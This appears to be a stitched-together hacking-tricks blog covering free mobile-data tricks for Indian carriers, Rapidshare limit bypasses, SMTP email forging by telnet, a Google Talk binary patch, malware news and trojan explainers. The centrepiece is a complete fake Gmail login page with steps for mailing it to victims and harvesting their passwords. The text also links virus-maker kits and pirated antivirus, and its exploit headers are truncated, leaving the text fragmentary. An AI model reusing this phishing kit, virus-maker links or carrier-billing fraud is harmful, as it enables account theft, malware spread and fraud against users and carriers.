IP

Folder Lock With Password Without Any Software

Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.

Access Free Airtel GPRS Using TeaShark Browser

Access Free Airtel GPRS Using TeaShark Browser:


TeaShark, a mobile browser
like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.


Here is how I used this…


* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point
.
* That’s it! Open any site from TeaShark and you won’t be charged anything.


Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!


As of now, this trick is limited to handsets only.


Note : “Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.


Download TeaShark :
http://teashark.com/download.html

AIRTEL TRICKS

Latest Airtel Hack:

 Now a days Airtel gives New option
to the Subscriber to access Mobile Office daily @ Rs.25.00/- per day. But this is too Costly.
Only 24 hours and the cost
is Rs.25.00 Oh GOD!!


But I got a Trick that’s help me to Activate my Mobile Office whole 30 days only for 25.00/. Its really good.


Just follow the Trick-
1) Your account balance should be above 25.00 for the first time.
2) Activate your mobile office by dialing *444*1#. You will Activate your Mobile Office in the Morning.
3) You got an Activation msg. Your account
should deducted by Rs. 25.00/-
4) After that your can enjoy mobile office for 24 hours.
5) But for unlimited access you will do this :: Just switch off your mobile from 7.00 am to 10.00am. and your account balance should be below 25.00 /
6) Just try it enjoy the whole world only by 25.00.


I am Sure you should be Benefited. JUST TRY IT!!!!!!!!!


 




VODAFONE TRICKS

Vodafone Hack For Free GPRS:
 

This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point
Settings :-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings :-
Packet Data Access
Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401






Vodafone Free GPRS Tricks Unlimited 2010:

Vodafone Free GPRS tricks 2010Now You Can Enjoy The Free GPRS With The Vodafone MobileBut You Must Change / Add The Settings Given BelowIn Your MobileThen Switch Off And On It Again Thats AllNow You Are Done ! Please Use The Following Settings
  1. Settings -> Connection -> Access Points.
  2. Select your Acces point to alter, ( or ) Options -> New acess Point.
  3. Then Change the following :
  • Connection Name : VODAFONE GPRS
  • APN : vlive
  • Port : 8080
  • Proxy Number : 196.6.120.12 Or 196.6.120.13
 
 
 

 






virusssssssssss

Email Worm Spreading Like Wildfire – W32.Imsolk.B@mm




A fast-moving email worm that began spreading on Thursday has been able to affect hundreds of thousands of computers worldwide, anti-virus provider Symantec warned.


The email arrives with the subject “Here you have.” An executable screensaver that’s disguised as a PDF document then tries to send the same message to everyone listed in the recipient’s address book. The .scr file is a variation of the W32.Imsolk.A@mm worm Symantec discovered last month.


In addition to spreading through email, it can propagate through mapped drives, autorun and instant messenger. It also has the ability to disable various security programs.


The worm is a throwback to attacks not seen in almost a decade, when the Anna Kournikova and I Love You attacks wreaked havoc on email systems worldwide. The Here You Go worm appears to different in that the malicious payload is downloaded from a page on members.multimania.com, rather than being attached to the email. That could make efforts to eradicate the worm easier.


Then again, McAfee said multiple variants of the worm appear to be spreading, so it’s not yet clear that the malicious screensaver is hosted by a single source.


Source: The Register
More Info: New Round of Email Worm, “Here you have”

Vodafone Distributes Mariposa Botnet:

 

Here is yet another example of a company distributing malware to its userbase. Unfortunately it probably won’t be the last.
Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.
The interesting thing is that when she plugged the phone to her PC via USB her Panda Cloud Antivirus went off, detecting both an autorun.inf and autorun.exe as malicious. A quick look into the phone quickly revealed it was infected and spreading the infection to any and all PCs that the phone would be plugged into.
Vodafone Botnet
Vodafone Botnet
A quick analysis of the malware reveals that it is in fact a Mariposa bot client. This one, unlike the one announced last week which was run by spanish hacker group “DDP Team”, is run by some guy named “tnls” as the botnet-control mechanism shows:
00129953 |. 81F2 736C6E74 |XOR EDX,746E6C73 ; ”tnls”
The Command & Control servers which it connects to via UDP to receive instructions are:
mx5.nadnadzz2.info
mx5.channeltrb123trb.com
mx5.ka3ek2.com
Once infected you can see the malware “phoning home” to receive further instructions, probably to steal all of the user’s credentials and send them to the malware writer.
Interestingly enough, the Mariposa bot is not the only malware I found on the Vodafone HTC Magic phone. There’s also a Confiker and a Lineage password stealing malware. I wonder who’s doing QA at Vodafone and HTC these days.
Source: Panda Research Blog

TeraBIT Virus Maker 2.8 SE:

TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)

Terabit Virusmaker
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran

dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe

Tested on Windows XP
September 19, 2007

Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.html

Virus Maker Professional 2008

Virus Maker
Virus Maker Professional 2008
Scanned By Kaspersky Internet Security 325, Nothing Found

Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk

ESET NOD32 Antivirus v3.0.672 Business Edition Full:

ESET NOD32 Antivirus System – Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint.
NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

Nod32 Full
Changes in version 3.0.672:
• Fixed problem causing instability on Microsoft Windows Vista 64-bit
• Fixed problem in anti spam module causing “Unexpected exception 003 and 007″ error messages

Size:19.6 MB
Download NOD32 Antivirus 3.0.672 Business :
http://rapidshare.com/files/147336388/ESET_NOD32_Antivirus_v3.0.672_Business_Edition_Full.rar


International Space Station Infected By Virus:

  NASA confirmed this week that a computer on the International Space Station is infected with a virus.

The malicious software is called W32.TGammima.AG, and technically it’s a worm.
The interesting point, other than how NASA could let this happen, is the way the worm spreads–on USB flash drives.
Malicious software spread by USB flash drives and other removable media takes advantage of a questionable design decision by Microsoft.
Windows is very happy to run a program automatically when a USB flash drive is inserted into a PC.
How convenient, both for end users and for bad guys.

Source : CNET
http://news.cnet.com/8301-13554_3-10027754-33.html

          







Running Multiple Instances of Google Talk

             

Running Multiple Instances of Google Talk:

 

 Users of Google Talk (GTalk) can also let GTalk go to polygamy, that’s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.


Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don’t want to log on and off from one account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.


You can add the /nomutex switch or parameter to existing Google Talk shortcut, or create a new shortcut with the /nomutex command line parameter.


To edit existing Google Talk shortcut:


1) Right click on the Google Talk shortcut.
2) On the right click contextual menu, click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).


Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex


5) Click on OK.




To create a new shortcut for Google Talk:


1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:


“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex


5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.


If you have hex editor, you can act like a hacker and modify the bits in Google Talk program so that it will always allow multiple instances of GTalk to be launched whether the /nomutex switch is specified or not.


Launch hex editor and open googletalk.exe, then search for the following patterns in the hex editor:


004536FD . 3BC6 CMP EAX,ESI
004536FF . 75 05 JNZ SHORT googleta.00453706


Modify the string to look like the following:


004536FD . 8BC1 MOV EAX,ECX
004536FF . EB 05 JMP SHORT googleta.00453706




How this Works?
The mutex is short for mutual exclusion object.
A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.


So, in the hack above, we used nomutex (no-mutex) to use the same resources simultaneously....!




Rapidshare Hack

-: Rapidshare Hack :-


There are two hacks to beat Rapidshare download limits and waiting time.



1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this-    javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait.....

















EMail Forging



-: EMail Forging :-


2) EMail Forging :-
Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has send the particular email.
The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.
Typically an attacker carries out email forging by following steps:

1)
Start Command Prompt and type the following command-
c:/>telnet smtp.mailserver.com 25
or c:/>telnet mail.domain.com 25
example:- c:/>telnet smtp.gmail.com 25
The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs.

2)
Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-


If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.



3)
The correct sequence of commands to be executed is:-
a) helo mailserver1.com
b) mail from:abc@mailserver1.com
c) rcpt to:xyz@mailserver2.com
d) data
e) .(dot command represents end of mail body)
This all as shown in figure below:



EMail forging by this technique does not possible, if mail relying is disabled by it's service provider..














EMail Hacking

-: EMail Hacking :-


All email communications on the internet are possible by two protocols:
1) Simple Mail Transfer Protocol (SMTP port-25) 2) Post Office Protocol (POP port-110)

E-Mail hacking consists of various techniques as discussed below.

1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram.

Mail-Path


The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this:


From Barr Thu Jan 3 05:33:26 2008
X-Apparently-To: prasannasherekar@yahoo.co.in via 203.104.16.34; Thu, 03 Jan 2008 05:25:38 +0530
X-YahooFilteredBulk: 189.160.34.89
X-Originating-IP: [189.160.34.89]
Return-Path: <atiles@destatis.de>
Authentication-Results: mta113.mail.in.yahoo.com from=destatis.de; domainkeys=neutral (no sig)
Received: from 189.160.34.89 (HELO dsl-189-160-34-89.prod-infinitum.com.mx) (189.160.34.89) by mta113.mail.in.yahoo.com with SMTP; Thu, 03 Jan 2008 05:25:38 +0530
Received: from dvapa ([141.203.33.92]) by dsl-189-160-34-89.prod-infinitum.com.mx with Microsoft SMTPSVC(6.0.3790.0); Wed, 2 Jan 2008 18:03:26 -0600
Message-ID: <477C264E.3000604@destatis.de>
Date: Wed, 2 Jan 2008 18:03:26 -0600
From: "Barr" <atiles@destatis.de>  Add to Address Book
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: prasannasherekar@yahoo.co.in
Subject: angel rubberneck
Content-Type: multipart/related; boundary="------------030604060204000701040304"
Content-Length: 16433 



 The above email header gives us the following information about it's origin and path:
a) Sender's email address :- atiles@destatis.de
b) Source IP address :- 141.203.33.92
c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx
d) Email client :- Thunderbird 2.0.0.6


Tips There are lots of ready-made tools available on the internet which performs email tracing very effectively and shows exact geographical location for email sender on the world map.


Recommended   Tools
NeoTrace
http://www.neotrace.com
VisualRoute
http://visualroute.visualware.com
E-MailTracker
http://www.visualware.com

 

Cracking GMail Account Password

-: Cracking GMail Account Password :-


Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :-   90%


Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-

 
           
The HTML code for above login screen created by me is given below-

                                         <html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type=text/css>
<!--
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}

.c {width: 4; height: 4}

.bubble {background-color:#C3D9FF}

.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}

.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}

.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}

.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }

// -->
</style>

<title>
  Gmail: Email from Google

</title>
  </noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()">
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
  <tr valign=top>
    <td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript>
    </td>
  <td width=99% bgcolor=#ffffff valign=top>
  <table width=100% cellpadding=1>
  <tr valign=bottom>
  <td><div align=right> </div></td>
  </tr>
  <tr>
  <td nowrap=nowrap>
  <table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>

  <tr>
  <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
  <script>utmx_section("title")</script>
  <td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td>
  <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
  </noscript>
  </tr>
  <tr>

  <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
  <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
  </tr>
  </table>
  </td>
  </tr>
  </table>
  </td>
  </tr>

</table>
  <table width=94% align=center cellpadding=5 cellspacing=1>
  <tr>
  <td valign=top style="text-align:left"><b>A Google approach to email.</b>
  <td valign=top>
  </tr>
  <tr>
  <td width=75% valign=top>

  <p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>,
  <br><br>
  <table align="center" width="75%">
  <tr><td><font size="-1">
  We are moving database partly to our new server.<br>
  This require your account verification for proper redirection...!<br>
  Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br>
  Repply this message within 72 hours.<br>
  Thank You ! for your Co-Operation........!
  </font><br><br>
  <b>GMail Team</b>
  </td></tr></table>
  </font>
      </p>
</noscript>
      </noscript> </td>  <td valign=top>
      <div id=login>
        <form id="gaia_loginform" action="login.asp" method="post">
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0">

  <tr>
                <td valign="top" style="text-align:center" nowrap="nowrap"
        bgcolor="#e8eefa">
                  <div class="loginBox">
                    <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
                      <tr>
                        <td colspan="2" align="center">
                          <table>
                            <tr>
                              <td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td>
                              <td valign="middle"> <font size="+0"><b>Account</b></font>
                              </td>
                            </tr>
                          </table></td>
                      </tr>
                      <script type="text/javascript"><!--
    function onPreCreateAccount() {
   
      return true;
   
    }

    function onPreLogin() {
   
     
      if (window["onlogin"] != null) {
        return onlogin();
      } else {
        return true;
      }
   
    }
  --></script>
                      <tr>
                        <td colspan="2" align="center"> </td>
                      </tr>
                      <tr>
                        <td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl">
                            Username: </span> </div></td>
                        <td> <input type="text" name="Email"  id="Email"
  size="18" value=""
 
    class='gaia le val'
 
  /> </td>
                      </tr>
                      <tr>
                        <td></td>
                        <td align="left"> </td>
                      </tr>
                      <tr>
                        <td align="right"> <span class="gaia le lbl"> Password:
                          </span> </td>
                        <td> <input type="password"
   name="Passwd" id="Passwd"
  size="18"
 
    class="gaia le val"
 
  /> </td>
                      </tr>
                      <tr>
                        <td> </td>
                        <td align="left"> </td>
                      </tr>
                      <tr>
                        <td> </td>
                        <td align="left"> <input type="submit" class="gaia le button" name="signIn"
           value="Move"
                  /> </td>
                      </tr>
                    </table>
  </div>
  </td>
  </tr>
</table>
</div>
</form>
      </div>    <br>
      <table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
        <tr bgcolor=#E8EEFA>
          <td valign=top align="center"><font size=+0><br>
            <font size="-1"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About
            Gmail</a
                  >     <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New
            features!</a> </font> </font></td>
  </table>
  </noscript>
     
  </table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
  <tr>
  <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
  <td class=bubble rowspan=2 style=text-align:left>
  <div align=center>
  <font size=-1 color=#666666>©2008 Google -
  <a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> -
  <a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> -
  <a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>

  - <a href="http://mail.google.com/support/">Help</a>
  </font>
  </div>
  </td>
  <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
  </tr>
  <tr>
  <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>

  <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
  </tr>
</table>
</body>
</html>




           
Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1)
Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-


            Your form must start with the following <form> HTML tag:<br>
            <form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">
            You must also include the following hidden configuration fields
              in your form so that formmail.com knows what account and form processor
              to use on the submitted data:
              <input type="hidden" name="_pid" value="94566">
              <input type="hidden" name="_fid" value="36THG54Z">
              You must also inform this form processor who you wish to have your
              form results emailed to. To do so, you must include a hidden form
              field that specifies the recipient:
              <input type="hidden" name="recipient" value="your email address">
              Please Note: the above field will work, but an even better solution
              is to use the ID number for that email address (thus hiding your
              address from spammers):
              <input type="hidden" name="recipient" value="1">
               



                                                 OR
 
2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.


Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?




UPNP - Multiple Remote Windows XP/ME/98 Vulnerabilities


UPNP - Multiple Remote Windows XP/ME/98 Vulnerabilities

Release Date: December 20, 2001
Severity: High
Vendor: Microsoft

Systems Affected:
Microsoft Windows XP (All default systems)
Microsoft Windows 98 (Certain configurations)
Microsoft Windows 98SE (Certain configurations)
Microsoft Windows ME (Certain configurations)

Playstation 3 "Remote Play" Remote DoS Exploit

Playstation 3 "Remote Play" Remote DoS Exploit

Mar 26 2007 05:24AM
mak0b inbox com

#!/usr/bin/perl
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.###
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K (mak0b[AT]inbox.com)
#
# POC code is based on odix's perl udp flooder
#########################################################

use Socket;

Mozilla Firefox FTP Request Remote DoS (Exploit)


Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:
*Mozilla Firefox version 1.5.0.6 and prior.

Exploit:
#!/usr/bin/perl
#author: tomas kempinsky

Yahoo mail Cross Site Scripting vulnerability


Yahoo mail Cross Site Scripting vulnerability


From: simo_at_morx.org
Date: Sun, 25 Dec 2005 18:00:29 -0000 (GMT)
Title: Yahoo mail Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk
Date: 22 December 2005
MorX Security Research Team
http://www.morx.org
Service: Webmail
Vendor: Yahoo mail, and possibly others
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Severity: High
Tested on: Microsoft IE 6.0

Internet Information Server 6.0 Denial Of Service


Internet Information Server 6.0 Denial Of Service


#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope@gmx.net
###########################################################
###********************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
###########################################################

Firefox 1.5 Buffer Overflow

Firefox 1.5 Buffer Overflow

Description:
Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file -- which most users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK (sickbeatz@gmail.com)

Javascript bug IE 6

Javascript bug IE 6

Error reported to Microsoft on Jun 07 2005 and again on Jun 08 2005, error reported to Opera on Jun 08 2005
Informed Google, MSN, Yahoo/AltaVista, Ilse, Lycos, Excite, Webcrawler on Jun 08 2005
Informed Norton, McAfee on Jun 08 2005

Internet Explorer 6 Print Without Prompt Bug



Internet Explorer 6 Print Without Prompt Bug


Application: Microsoft Internet Explorer
Versions: 6.0
Platforms: Windows
Bugs: IE 6 allows JavaScript to send documents to the printer without prompting the user.
Exploitation: Client
Date: 12 April 2004
Author: Ben Garvey
bengarvey_at_comcast.net
http://www.bengarvey.com
Bugtraq report format: Thanks Luigi Auriemma!
########################################################

The Trojan Horse

-: The Trojan Horse :-


What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia

"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory

Types of Trojan :-
Trojan The different types of Trojan Horses are as follows-

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.

2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.

3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.

4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.

5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.

6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.

7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".

How Trojan Works ?
Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.

       It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.

       Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

How Trojan Horses Are Installed ?
Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.
  • Software Downloads
  • Websites containing executable content (ActiveX control)
  • Email Attachments
  • Application Exploits (Flaws in a web applications)
  • Social Engineering Attacks

The Removal :-
Antivirus software is designed to detect and delete Trojan horses ideally preventing them from ever being installed.

Computer Viruses

-: Computer Viruses :-


What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :-
The different types of viruses are as follows-

-: Honeypots :-

-: Honeypots :-


Definition :-
"Honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems."  -Wikipedia

"Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource."  -Lance Spitzner

